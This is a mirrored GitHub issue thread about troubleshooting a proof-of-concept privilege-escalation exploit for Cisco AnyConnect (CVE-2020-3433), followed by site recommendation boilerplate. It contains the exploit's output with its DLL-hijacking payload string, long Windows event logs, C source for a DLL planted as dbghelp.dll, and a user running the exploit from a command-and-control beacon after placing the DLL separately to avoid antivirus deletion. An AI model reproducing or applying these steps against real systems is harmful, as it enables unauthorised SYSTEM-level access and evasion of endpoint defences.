Comments (4)
I achieved to have a working homemade DLL! Thank you!
My DLL was compiled in x64 but I forgot that vpndownloader is x86 u_u
And I can confirm that you have this message Unable to obtain entry point MiniDumpWriteDump
when it works :)
from cve-2020-3433.
Hi,
Thank you for you feedback!
I tried on AnyConnect 4.8.3036 a few minutes ago on one of my machine, and a system shell pops despite the same "The downloader command line arguments are invalid" message in Windows Event logs (cf. below).
Could you paste the output of the PoC? Any chance the DLL is deleted by an AV? Did you try with another DLL?
ProviderName : acvpndownloader
Message : Cisco AnyConnect Secure Mobility Client Downloader (2) exiting, version 4.8.03036 , return code 1
[0x00000001]ProviderName : acvpndownloader
Message : Function: wWinMain
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\downloader.cpp
Line: 365
Invoked Function: CDnldrIpc::SendAckMsgToDownloader
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECTProviderName : acvpndownloader
Message : Function: CDnldrIpc::SendAckMsgToDownloader
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\dnldripc.cpp
Line: 1799
Invoked Function: CIpcClientConnection
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECTProviderName : acvpndownloader
Message : Function: CIpcClientConnection::CIpcClientConnection
File:
c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\ipcclientconnection.cpp
Line: 82
Invoked Function: CIpcTransport::connectIpc
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECTProviderName : acvpndownloader
Message : Function: CIpcTransport::terminateIpcConnection
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\ipc\ipctransport.cpp
Line: 459
Invoked Function: CSocketTransport::writeSocketBlocking
Return Code: -31588319 (0xFE1E0021)
Description: SOCKETTRANSPORT_ERROR_NO_SOCKET_HANDLE:The socket transport does not possess a valid
socket handle.ProviderName : acvpndownloader
Message : Function: CIpcTransport::connectIpc
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\ipc\ipctransport.cpp
Line: 305
Invoked Function: CSocketTransport::connectTransport
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECTProviderName : acvpndownloader
Message : Function: CSocketTransport::connectTransport
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\ipc\sockettransport.cpp
Line: 1151
Invoked Function: ::WSAConnect
Return Code: 10061 (0x0000274D)
Description: No connection could be made because the target machine actively refused it.ProviderName : acvpndownloader
Message : Function: CInstallTask::DoPrivilegedInstall
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\installtask.cpp
Line: 942
Installer exit code: 1 (failure). See the log file
C:\Windows\TEMP\anyconnect-vpndownloader-install-16152224012022.log for more information.ProviderName : acvpndownloader
Message : Function: wWinMain
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\downloader.cpp
Line: 235
The downloader command line arguments are invalidProviderName : acvpndownloader
Message : Function: CHModuleMgr::STGetProcAddress
File:
c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\utility\win\hmodulemgr.cpp
Line: 272
Invoked Function: GetProcAddress
Return Code: 127 (0x0000007F)
Description: The specified procedure could not be found.
Unable to obtain entry point MiniDumpWriteDumpProviderName : acvpndownloader
Message : Function: CVerifyFileSignatureWindows::IsValid
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\commoncrypt\verifyfilesignatur
ewindows.cpp
Line: 110
Code-signing verification succeeded. File (C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility
Client\Temp\Installer\17592.tmp\vpndownloader.exe)ProviderName : acvpndownloader
Message : Installing software (C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility
Client\Temp\Installer\17592.tmp\vpndownloader.exe /norestart /quiet NOINSTALLACTIVEX=1 WEBLAUNCH=1
/lvx* C:\Windows\TEMP\anyconnect-vpndownloader-install-16152224012022.log)ProviderName : acvpndownloader
Message : Cisco AnyConnect Secure Mobility Client Downloader (2) started, version 4.8.03036 , opcode 3
from cve-2020-3433.
The DLL is deleted by the AV if it's dropped by the exploit, so I dropped the dll separately at C:\Users\john.doe\AppData\Local\Temp\3\03746282\dbghelp.dll
and I changed the code accordingly.
Here is the output (because I don't have a graphical access, I have to monitor created process but no cmd has been spawned):
beacon> execute-assembly CVE-2020-3433-privesc.exe
[*] Tasked beacon to run .NET program: CVE-2020-3433-privesc.exe
[+] host called home, sent: 488491 bytes
[+] received output:
Cisco AnyConnect privesc PoC (CVE-2020-3433)
September 2020
Author: ATGO
[+] received output:
[*] Cisco AnyConnect version: 4.8.3036
[*] "-ipc" argument needed
[*] Writing dbghelp.dll in a random temp folder (C:\Users\john.doe\AppData\Local\Temp\3\03746282) - should be deleted after the exploit
[*] Payload: "CAC-nc-install -ipc=1337 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\john.doe\AppData\Local\Temp\3\03746282\dbghelp.dll"
[*] Sending payload
[*] Sleeping 5s before cleaning
[*] Deleting C:\Users\john.doe\AppData\Local\Temp\3\03746282
[*] Done
I also tried with the following homemade dll (tested with rundll32.exe dbghelp.dll,Start) but without success:
#include <windows.h>
#include <Wtsapi32.h>
#pragma comment(lib, "Wtsapi32.lib")
void StartProcess()
{
HANDLE hFile = CreateFile(L"C:\\Temp\\niconnectproof.txt", GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
char DataBuffer[] = "This is some test data to write to the file.";
DWORD dwBytesToWrite = (DWORD)strlen(DataBuffer);
DWORD dwBytesWritten = 0;
WriteFile(hFile, DataBuffer, dwBytesToWrite, &dwBytesWritten, NULL);
CloseHandle(hFile);
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
StartProcess();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
I didn't have the event you had with the message Unable to obtain entry point MiniDumpWriteDump
. I don't know if it's linked.
from cve-2020-3433.
Great, nice job!
from cve-2020-3433.
Related Issues (1)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cve-2020-3433.